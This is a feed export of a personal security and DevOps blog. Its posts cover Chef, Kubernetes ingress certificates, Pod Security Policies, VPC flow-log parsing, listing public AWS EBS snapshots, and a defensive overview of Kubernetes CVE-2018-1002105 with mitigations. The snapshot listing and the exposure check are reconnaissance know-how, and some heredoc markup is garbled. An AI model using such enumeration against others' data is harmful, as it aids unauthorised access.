tag:blogger.com,1999:blog-18529808059475685682024-03-25T19:35:38.161+05:30Security Unplugged !!!Bit of Everything! Vulnerability Research, Reverse Engineering, Malware Analysis, Exploits etc...Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.comBlogger128125tag:blogger.com,1999:blog-1852980805947568568.post-17147181047184964702020-02-19T01:15:00.001+05:302020-02-19T01:15:47.877+05:30Listing AWS Public EBS Snapshots<br />
<h4>
Create Volume Permissions</h4>
The create volume permissions fall into the following categories:<br />
<br />
o public : The owner of the snapshot granted create volume permissions<br />
for the snapshot to the all group. All AWS accounts have create vol-<br />
ume permissions for these snapshots.<br />
<br />
o explicit : The owner of the snapshot granted create volume permis-<br />
sions to a specific AWS account.<br />
<br />
o implicit : An AWS account has implicit create volume permissions for<br />
all snapshots it owns.<br />
<br />
<h4>
--filters</h4>
o owner-alias - Value from an Amazon-maintained list (<b>amazon | self</b><br />
<b> | all | aws-marketplace | microsoft</b> ) of snapshot owners. Not to<br />
be confused with the user-configured AWS account alias, which is<br />
set from the IAM console.<br />
<br />
Run <b><i>aws ec2 describe-snapshots help</i></b> to get the help for command in scope.<br />
<br />
Below command lists public EBS snapshots<br />
<span style="font-family: Courier New, Courier, monospace;">praveend$ aws ec2 describe-snapshots --profile pd-dev --region us-east-1 --output table --filters Name=owner-alias,Values=all</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com30tag:blogger.com,1999:blog-1852980805947568568.post-30648901728632246242019-09-15T06:30:00.000+05:302019-09-15T06:39:40.504+05:30Testing/Writing Chef Cookbooks<br /><br /><b>Writing cookbooks</b><br /><br />Cookbooks has attributes, recipes, templates etc<br /><br /><br /><b>Using Community cookbooks</b><br /><ol>
<li>Modify Berksfile in the cookbook by adding cookbook name, say, cookbook 'yum-centos', '~> 3.0.0' </li>
<li>Modify metadata.rb in cookbook by updating dependencies, say, depends 'yum-centos', '~> 3.0.0' </li>
<li>Execute below commands </li>
</ol>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ berks install<br />$ berks upload</span></blockquote>
<b>Prerequisites</b><br /><br />Make sure we have below configs/files<br /><ul>
<li>Chef cookbook </li>
<li>Chef Environment </li>
<li>Chef Role </li>
</ul>
<b>Testing cookbook locally</b><br /> <br /><ol>
<li>Install vagrant from <a href="https://www.vagrantup.com/downloads.html">https://www.vagrantup.com/downloads.html</a> </li>
<li>Install Virtualbox </li>
<li>Modify .kitchen.yml file referring to community cookbook recipe to test locally. </li>
<li>Goto cookbook directory and execute kitchen commands to build, list, login to new created resource from chef cookbooks. </li>
</ol>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kitchen converge<br />$ kitchen list<br />$ kitchen login</span></blockquote>
<b>Update authentication key </b><br /><span style="font-family: Courier New, Courier, monospace;"># Connect to chef server </span><div>
<span style="font-family: Courier New, Courier, monospace;">[pd@ip-disects ~]$ ssh -A -t SSH_SERVER_IP </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"># Following commands are executed on chef server </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ERROR: Conflict </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Response: Username or email address already in use. </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Do you want to delete the user praveend? (Y/N) y </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Checking organization memberships... </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Checking admin group memberships for 1 org(s). </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">FATAL: praveend is in the 'admins' group of the following organization(s): </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">- disects</span><br /> <br /><br /><br />Run this command again with the <i>--remove-from-admin-groups</i> option to remove the user from these admin group(s) automatically. </div>
<div>
<span style="font-family: Courier New, Courier, monospace;">[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend --remove-from-admin-groups </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Do you want to delete the user praveend? (Y/N) y </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Checking organization memberships... </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Checking admin group memberships for 1 org(s). </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Removing praveend from admins group of 'disects' </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Deleting user praveend. </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br />[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">[pd@ip-disects ~]$ sudo chef-server-ctl org-user-add disects praveend --admin </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">User praveend is added to admins and billing-admins group </span><br /><br /><br />Upload working cookbook to chef server after local testing. Test the cookbook on a cluster node to make sure everything is working fine, this needs some experience though.<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ knife cookbook upload cookbook_name</span></blockquote>
</div>
<div>
<br /></div>
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com24tag:blogger.com,1999:blog-1852980805947568568.post-14058462253891431882019-09-15T06:08:00.001+05:302019-09-15T06:08:22.640+05:30Kubernetes ingress custom Certificates with valid CA<br /><br />Irrespective of ingress FQDN, Kubernetes creates Certificates with domain name ingress.local which creates below issues.<br />CoreOS Dex need certificates from valid CA, self-signed certificates will now work<br />Gardener dashboard authentication has issues with self-signed certificates. AuthN flow will not happen without accepting invalid Cert error<br />Accessing ingress in any browser will complain self-signed server error<br /><br /><b>Fix</b>: Lets encrypt<br /><br /><br />Install <b>Certbot</b> from LetsEncrypt<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ brew install certbot</span></blockquote>
<br />Create wildcard Certificate for domain, <i><b>*.pd.example.com </b></i><br /><br />Before entering Yes to confirm, make sure you add TXT record entry as prompted by certbot.<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"># create directories named le_wd, le_cd, le_ld before executing below command<br />$ certbot certonly --manual -d *.pd.example.com --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld </span></blockquote>
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"># Check if certificates are created<br />$ certbot certificates --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld</span></blockquote>
<div>
<br />Certs are located at le_cd/live/pd.example.com /<br /><br /><br />Create secret with the Certificates we want to use<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create secret tls pd-custom-certs --key </span><span style="font-family: "Courier New", Courier, monospace;">pd.example.com</span><span style="font-family: Courier New, Courier, monospace;">.key --cert </span><span style="font-family: "Courier New", Courier, monospace;">pd.example.com</span><span style="font-family: Courier New, Courier, monospace;">.crt -n namespace_of_interest
</span></blockquote>
<br /><br />Configure ingress with the TLS secret.<br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">----SNIP(FQDN 1)----
ingress:
enabled: </span><span class="hljs-literal" style="color: #0086b3; font-family: monospace; font-size: 14px; white-space: pre;">true</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
path: /
hosts:
- a</span>.pd.example.com<span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
tls:
- hosts:
- a</span>.pd.example.com<span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
secretName: pd-custom-certs
----SNIP(FQDN 2)----
ingress:
enabled: </span><span class="hljs-literal" style="color: #0086b3; font-family: monospace; font-size: 14px; white-space: pre;">true</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
path: /
hosts:
- b</span>.pd.example.com<span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
tls:
- secretName: pd-custom-certs
hosts:
- </span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">b</span>.pd.example.com<br /><br />Accessing ingress should not show invalid Cert errors now.<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com6tag:blogger.com,1999:blog-1852980805947568568.post-44104243133326558432019-09-15T05:55:00.001+05:302019-09-15T05:55:06.483+05:30Kubernetes Pod Security Policies<br /><br />Start minikube with RBAC and admission-plugins enabled<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy<br /># or<br />$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.Admission.PluginNames=PodSecurityPolicy</span></blockquote>
<div>
<br />These commands are not working on my Mac machine, looks like API Server issue as it is not accepting any requests (might not be up). <br /><br />Create namespace and Service Account<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create namespace praveend-psp
kubectl create sa test-psp-sa -n praveend-psp</span></blockquote>
<br /><b>Policy definitions</b><br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;"><a name='more'></a>$ cat praveend_psp.yaml
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
name: praveend-psp
spec:
privileged: </span><span class="hljs-literal" style="color: #0086b3; font-family: monospace; font-size: 14px; white-space: pre;">false</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;"> </span><span class="hljs-comment" style="color: #969896; font-family: monospace; font-size: 14px; white-space: pre;"># Don't allow privileged pods!</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
</span><span class="hljs-comment" style="color: #969896; font-family: monospace; font-size: 14px; white-space: pre;"># The rest fills in some required fields.</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
allowPrivilegeEscalation: </span><span class="hljs-literal" style="color: #0086b3; font-family: monospace; font-size: 14px; white-space: pre;">false</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
runAsUser:
rule: RunAsAny
fsGroup:
rule: RunAsAny
volumes:
- </span><span class="hljs-string" style="color: #df5000; font-family: monospace; font-size: 14px; white-space: pre;">'*'</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
$ cat clusterR.yaml
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: psp-test-cr
rules:
- apiGroups: [</span><span class="hljs-string" style="color: #df5000; font-family: monospace; font-size: 14px; white-space: pre;">""</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">]
resources: [</span><span class="hljs-string" style="color: #df5000; font-family: monospace; font-size: 14px; white-space: pre;">"podsecuritypolicies"</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">]
resourceNames:
- praveend-psp
verbs:
- use
$ cat clusterRB.yaml
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: cluster-admin-rb
roleRef:
kind: ClusterRole
name: psp-test-cr
apiGroup: rbac.authorization.k8s.io
subjects:
</span><span class="hljs-comment" style="color: #969896; font-family: monospace; font-size: 14px; white-space: pre;"># Authorize specific service accounts:</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
- kind: ServiceAccount
name: </span><span class="hljs-built_in" style="color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">test</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">-psp-sa
namespace: praveend-psp</span></div>
<div>
<br /><br />Create PodSecurityPolicy, ClusterRole and ClusterRoleBinding. ClusterRoleBinding is between ClusterRole/Role and Service Account, User, Group ets.<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create -f praveend_psp.yaml -n praveend-psp </span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: "Courier New", Courier, monospace;">$ kubectl create -f clusterR.yaml -n praveend-psp </span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create -f clusterRB.yaml -n praveend-psp</span></blockquote>
</div>
<div>
<br />Check if we have proper authentication to create PodSecurityPolicy in <i>praveend-psp</i> namespace<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl auth can-i use podsecuritypolicy/praveend-psp -n praveend-psp</span></blockquote>
<br />Create Pod in test-psp-minikube namespace<br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">$ kubectl -n </span><span class="hljs-built_in" style="color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">test</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">-psp-minikube create </span><span class="hljs-_" style="color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">-f</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">- <<eof -="" apiversion:="" containers:="" eof="" image:="" k8s.gcr.io="" kind:="" metadata:="" name:="" pause="" pod="" span="" spec:="" v1=""><br /><br /><br />Create privileged Pod in <i>praveend-psp</i> namespace<br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">$ kubectl -n </span><span class="hljs-built_in" style="color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">test</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">-psp-minikube delete </span><span class="hljs-_" style="color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">-f</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">- <<eof -="" apiversion:="" containers:="" image:="" k8s.gcr.io="" kind:="" metadata:="" name:="" pause="" pod="" privileged:="" privileged="" securitycontext:="" span="" spec:="" v1=""><span class="hljs-literal" style="color: #0086b3; font-family: monospace; font-size: 14px; white-space: pre;">true</span><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">
EOF</span><br /><br /><br /><b>References</b><br /><ol>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/">https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/</a></li>
<li><a href="https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#how-do-i-turn-on-an-admission-control-plug-in">https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#how-do-i-turn-on-an-admission-control-plug-in</a></li>
<li><a href="https://kubernetes.io/docs/concepts/policy/pod-security-policy/">https://kubernetes.io/docs/concepts/policy/pod-security-policy/</a></li>
</ol>
<br /></eof></span></eof></span></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com3tag:blogger.com,1999:blog-1852980805947568568.post-10142656898841750692018-12-07T06:28:00.001+05:302018-12-07T07:23:37.567+05:30Kubernetes Privilege Escalation (CVE-2018-1002105)<h2>
Introduction</h2>
Kubernetes is an open source production grade container orchestration system for deploying and managing docker/container applications. There are managed kubernetes orchestration service providers like Amazon Elastic Container Service for Kubernetes (EKS), Azure Kubernetes Service (AKS) etc.<br />
<br />
<h2>
kubectl</h2>
Kubernetes cluster users can perform management tasks using kubectl binary which talks to API Server. Example kubectl commands<br />
<br />
# display pod resource<br />
<span style="font-family: "courier new" , "courier" , monospace;">kubectl get pods -n my_namespace</span><br />
<br />
# Execute a command in a container<br />
<span style="font-family: "courier new" , "courier" , monospace;">kubectl -n my_namespace exec -it pods_name -- sh</span><br />
<br />
<br />
<span style="font-family: "times" , "times new roman" , serif;"># Listen on ports 5000 and 6000 locally, forwarding data to/from ports 5000 and 6000 in the pod</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">kubectl -n my_namespace port-forward pod/mypod 5000 6000</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"># Get output from ruby-container from pod </span><span style="font-family: "times" , "times new roman" , serif;">my-pod-pd</span><br />
<span style="font-family: "times" , "times new roman" , serif;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">kubectl attach my-pod-pd -c ruby-container</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihAvBa11RMj6as0B3ZZMvLbw6efhYVTS4mHfvnnEdU05RR3m_t2WLQyGwMqaCKYhzmGMLMPgYrRsTtH7Ktwr_-p1ypA79En85UMzLOy-rS726Wry29AV-HdRKYbMmjrZHLL9YJZcGBxewk/s1600/k8s_simple.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="359" data-original-width="638" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihAvBa11RMj6as0B3ZZMvLbw6efhYVTS4mHfvnnEdU05RR3m_t2WLQyGwMqaCKYhzmGMLMPgYrRsTtH7Ktwr_-p1ypA79En85UMzLOy-rS726Wry29AV-HdRKYbMmjrZHLL9YJZcGBxewk/s640/k8s_simple.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">kubectl execution flow (source: 1ambda.github.io)</td></tr>
</tbody></table>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<h2>
<span style="font-family: "times" , "times new roman" , serif;">kubelet</span></h2>
kubelet, kube-proxy run's on each compute node (VM, Worker, EC2 Instance etc), kubelet listens on TCP port 10250 and 10255 (with no authentication/authorization). API Server acts as Reverse Proxy to kubelet and API Aggregation. API Server connects to the kubelet to fulfill commands like exec, port=forward and opens a websocket connection which connects stdin, stdout, or stderr to user’s original call [01].<br />
<div class="p1">
<br /></div>
<h2>
API Aggregation</h2>
Installing or writing additional API's into Kubernetes API Server i.e. extending core API Server<br />
<br />
<h2>
Vulnerability</h2>
<div>
Vulnerability is in Kubernetes API Server, crafted request can execute arbitrary commands on the backend servers (pods) through the same channel client established to backend through API Server [02]</div>
<div>
<br /></div>
<div>
Check nodes Kubernetes version</div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">
$ kubectl get nodes -o wide <br />
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME <br />
pd-worker-01 Ready node 13d v1.12.3 10.250.0.6 <none> Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1 <br />
pd-worker-02 Ready node 13d v1.12.3 10.250.0.5 <none> Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1 <br />
pd-worker-03 Ready node 13d v1.12.3 10.250.0.4 <none> Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1</none></none></none></span><br />
<br />
<h2>
Vulnerable API Servers</h2>
If API server response looks as bellow and using vulnerable API versions of Kubernetes the you are vulnerable using anonymous-user escalation, patch Kubernetes immediately.<br />
HTTP response error code 403 indicates Forbidden i.e. related to <i>Authorization</i> implies we successfully passed through <i>Authentication</i> phase.<br />
<span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">{</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"kind"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"Status"</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"apiVersion"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"v1"</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"metadata"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">{</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">}</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"status"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"Failure"</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"message"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"forbidden: User \"system:anonymous\" cannot get path \"/api/v1/\""</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"reason"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"Forbidden"</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"details"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">{</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">}</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">,</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token" style="background-color: #f4f5f7; color: #36b37e; font-family: monospace; font-size: 12px; white-space: pre;">"code"</span><span class="token,operator" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">:</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"> </span><span class="token" style="background-color: #f4f5f7; color: #0052cc; font-family: monospace; font-size: 12px; white-space: pre;">403</span><span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">
</span><span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">}</span><br />
<span class="token,punctuation" style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;"><br /></span>
<br />
<h4>
anonymous user</h4>
By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a username of <i>system:anonymous</i> and a group of <i>system:unauthenticated</i>.<br />
<br />
<h2>
Mitigations</h2>
There are three levels of escalation mitigations<br />
<h3>
1. anonymous user -> aggregated API server</h3>
<div>
API Server admission-controller parameter anonymous-auth is set to fault</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl get po kube-apiserver-01 -n prod -o yaml | grep -i "anonymous-auth" - --anonymous-auth=false </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl get po kube-apiserver-01 -n stage -o yaml | grep -i "anonymous-auth" - --anonymous-auth=false</span></div>
<h3>
<br /></h3>
<h3>
2. authenticated user -> aggregated API server</h3>
Suspend aggregated API servers usage<br />
<h3>
<br /></h3>
<h3>
3. authorized pod exec/attach/portforward -> kubelet API</h3>
Remove pod exec/attach/portforward permissions for users<br />
<h2>
<br /></h2>
<h2>
References</h2>
[01]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html<br />
[02]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html<br />
[03]. https://elastisys.com/2018/12/04/kubernetes-critical-security-flaw-cve-2018-1002105/<br />
[04]. https://github.com/kubernetes/kubernetes/issues/71411<br />
<br />
<span style="font-family: "times" , "times new roman" , serif;"></span><br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; line-height: 18.0px; font: 16.0px Helvetica; color: #252525; -webkit-text-stroke: #252525; background-color: #ffffff}
span.s1 {font-kerning: none}
</style><br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 16.0px 0.0px; line-height: 17.0px; font: 14.0px 'Helvetica Neue'; color: #24292e; -webkit-text-stroke: #24292e}
p.p2 {margin: 0.0px 0.0px 16.0px 0.0px; line-height: 17.0px; font: 14.0px 'Helvetica Neue'; color: #24292e; -webkit-text-stroke: #24292e; background-color: #ffffff}
span.s1 {font-kerning: none; background-color: #ffffff}
span.s2 {font-kerning: none}
</style>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com9tag:blogger.com,1999:blog-1852980805947568568.post-90277410550873993312018-01-20T06:37:00.002+05:302018-01-20T06:40:37.273+05:30AWS VPC Flow Logs grok Pattern<br />
Amazon Web Services(AWS) can generate VPC flow logs, format below<br />
<span style="font-family: "courier new" , "courier" , monospace;">2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK</span><br />
<br />
For more information on flow logs and grok filter plugin refer below links<br />
<a href="https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/flow-logs.html">https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/flow-logs.html</a><br />
<a href="https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html">https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html</a><br />
<br />
grok patterns can be tested using below links<br />
<a href="http://grokdebug.herokuapp.com/">http://grokdebug.herokuapp.com</a><br />
<a href="http://grokconstructor.appspot.com/do/match#result">http://grokconstructor.appspot.com/do/match#result</a><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">%{NONNEGINT:version} %{NONNEGINT:accountid} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NONNEGINT:srcport} %{NONNEGINT:dstport} %{NONNEGINT:protocol} %{NONNEGINT:packets} %{NONNEGINT:bytes} %{NONNEGINT:starttime} %{NONNEGINT:endtime} %{NOTSPACE:action} %{NOTSPACE:log-status}</span><br />
<br />
Test using grokdebugger<br />
